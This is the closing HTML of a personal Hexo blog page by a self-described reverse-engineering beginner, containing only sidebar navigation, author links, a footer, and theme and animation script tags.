href="#30-ret2xxone"><span class="nav-text">30.ret2xxone</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="bj777"
      src="/images/bitbug_favicon.ico">
  <p class="site-author-name" itemprop="name">bj777</p>
  <div class="site-description" itemprop="description">一位逆向菜狗</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/jonathanbest7" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;jonathanbest7" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/506611735@qq.com" title="E-Mail → 506611735@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.zhihu.com/people/bang-ji-1" title="知乎 → https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;bang-ji-1" rel="noopener" target="_blank"><i class="fab fa-zhihu fa-fw"></i>知乎</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">bj777</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  
		<canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
		<script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
		<script type="text/javascript" src="/js/src/fireworks.js"></script>
  
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":false},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
